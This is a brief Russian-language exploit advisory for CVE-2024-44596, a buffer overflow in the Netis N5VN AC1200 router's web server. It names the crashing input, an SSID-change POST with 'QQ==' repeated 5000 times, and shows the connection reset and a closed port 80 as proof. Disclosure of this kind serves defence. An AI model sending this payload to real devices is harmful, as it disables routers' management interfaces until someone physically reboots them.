
Дата: 05/03/2024
Автор эксплойта: Van Lam Nguyen
Facebook: fb.com/vanlam1412
Сайт производителя: Netis Systems
Версия: Netis N5VN AC1200 V1.0.1.1742
Протестировано на: Windows
CVE : CVE-2024-44596
В маршрутизаторе Netis N5VN AC1200 существует уязвимость переполнения буфера, которая позволяет злоумышленнику вызвать сбой веб-сервера, запущенного на маршрутизаторе, путём отправки специально сформированного запроса
Чтобы восстановить работу HTTP (веб-сервера), пользователю необходимо физически перезагрузить маршрутизатор.
POST-запрос для изменения SSID беспроводной сети 2.4G ('ssid': 'QQ==' * 5000)
Успешно: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http
Смотрите видео-демонстрацию здесь

